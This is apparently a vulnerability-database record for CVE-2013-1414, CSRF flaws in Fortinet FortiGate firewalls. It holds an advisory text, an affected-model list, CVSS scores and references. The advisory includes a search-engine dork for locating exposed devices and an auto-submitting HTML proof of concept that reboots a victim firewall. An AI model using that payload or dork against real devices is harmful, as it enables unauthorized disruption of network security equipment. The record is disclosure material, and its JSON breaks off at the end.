Vulnerabilites related to fortinet - fortigate-620b
var-201307-0030
Vulnerability from variot
Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2
Description
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.
Requirements
An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device.
Report-Timeline:
Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed
Google Dork:
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
Sven Wurth dos@net-war.de
PoC
This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability.
CSRF - Proof Of Concept
document.myForm.submit();End Poc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201307-0030",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.0.1"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "4.3.10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.1,
"vendor": "fortinet",
"version": "5.0.2"
},
{
"model": "fortigate-3810a",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-310b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigaterugged-100c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-300c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5060",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.12"
},
{
"model": "fortigate-5101c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3240c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-300c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3240c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "5.x"
},
{
"model": "fortigate-5060",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-310b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3810a",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5101c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate rugged-100c",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "4.3.12"
},
{
"model": "fortios b0630",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios b0537",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios b064",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.0"
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
},
{
"model": "fortigate-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.00"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.6"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.5"
},
{
"model": "fortigate 800f",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "800"
},
{
"model": "fortigate 620b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 60m",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "60"
},
{
"model": "fortigate 50am",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 50a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 500a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "500"
},
{
"model": "fortigate 400a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "400"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3950"
},
{
"model": "fortigate 3810a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3600a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3600"
},
{
"model": "fortigate 311b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 310b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 3016b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 300a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "300"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.00"
},
{
"model": "fortigate 224b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 200b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 200a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "200"
},
{
"model": "fortigate 1240b",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 100a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 1000afa2",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate 1000a",
"scope": null,
"trust": 0.3,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "1000"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "100"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.3"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.13"
}
],
"sources": [
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:fortinet:fortigaterugged-100c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-1000c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-100d",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-110c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-1240b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-200b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-20c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-300c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3040b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-310b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-311b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3140b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3240c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3810a",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3950b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-40c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5001a-sw",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5001b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5020",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5060",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-50b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5101c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5140b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-600c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-60c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-620b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-800c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-80c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-voice-80c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fortinet:fortios",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sven Wurth",
"sources": [
{
"db": "BID",
"id": "60861"
},
{
"db": "PACKETSTORM",
"id": "122216"
}
],
"trust": 0.4
},
"cve": "CVE-2013-1414",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CVE-2013-1414",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-61416",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-1414",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-1414",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-116",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-61416",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414\nVulnerability Type: CSRF (Cross-Site Request Forgery)\nProduct: All Fortigate Firewalls\nVendor: Fortinet http://www.fortinet.com\nVulnerable Version: \u003c 4.3.13 \u0026 \u003c 5.0.2\n \nDescription\n==========\nBecause many functions are not protected by CSRF-Tokens, it\u0027s possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. \n \nRequirements\n===========\nAn Attacker needs to know the IP of the device. \nAn Administrator needs an authenticated connection to the device. \n \n \nReport-Timeline:\n================\nVendor Notification: 11 July 2012\nVendor released version 5.0.2 / 18 March 2013\nVendor released version 4.3.13 / 29 April 2013\nStatus: Fixed\n \nGoogle Dork:\n==========\n -english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"\n \n \nCredit:\n=====\nSven Wurth dos@net-war.de\n \n \nPoC\n====\n \nThis Example will reboot a Fortinet Firewall. \nThis is just one of many possibilities to attack this vulnerability. \n \n##### CSRF - Proof Of Concept ####\n\u003chtml\u003e\n\u003cbody onload=\"submitForm()\"\u003e\n\u003cform name=\"myForm\" id=\"myForm\"\n action=\"https://###_VICTIM_IP_###/system/maintenance/shutdown\" method=\"post\"\u003e\n \u003cinput type=\"hidden\" name=\"reason\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"1\"\u003e\n \u003cinput type=\"submit\" name=\"add\" value=\"rebootme\"\u003e\n\u003c/form\u003e\n\u003cscript type=\u0027text/javascript\u0027\u003edocument.myForm.submit();\u003c/script\u003e\n\u003c/html\u003e\n##### End Poc #####\n \n \n \n \n \n \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1414"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "PACKETSTORM",
"id": "122216"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-61416",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1414",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "26528",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116",
"trust": 0.7
},
{
"db": "BID",
"id": "60861",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "122216",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-80159",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-61416",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"id": "VAR-201307-0030",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T14:34:19.704000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FortiGate\u30a2\u30d7\u30e9\u30a4\u30a2\u30f3\u30b9",
"trust": 0.8,
"url": "http://www.fortinet.co.jp/products/fortigate/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/26528/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414"
},
{
"trust": 0.3,
"url": "https://www.fortinet.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1414"
},
{
"trust": 0.1,
"url": "http://www.fortinet.com"
},
{
"trust": 0.1,
"url": "https://###_victim_ip_###/system/maintenance/shutdown\""
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-07-08T00:00:00",
"db": "VULHUB",
"id": "VHN-61416"
},
{
"date": "2013-06-28T00:00:00",
"db": "BID",
"id": "60861"
},
{
"date": "2013-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"date": "2013-06-28T22:13:39",
"db": "PACKETSTORM",
"id": "122216"
},
{
"date": "2013-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"date": "2013-07-08T17:55:02.783000",
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-07-08T00:00:00",
"db": "VULHUB",
"id": "VHN-61416"
},
{
"date": "2013-06-28T00:00:00",
"db": "BID",
"id": "60861"
},
{
"date": "2013-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"date": "2013-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"date": "2013-07-08T17:55:02.783000",
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
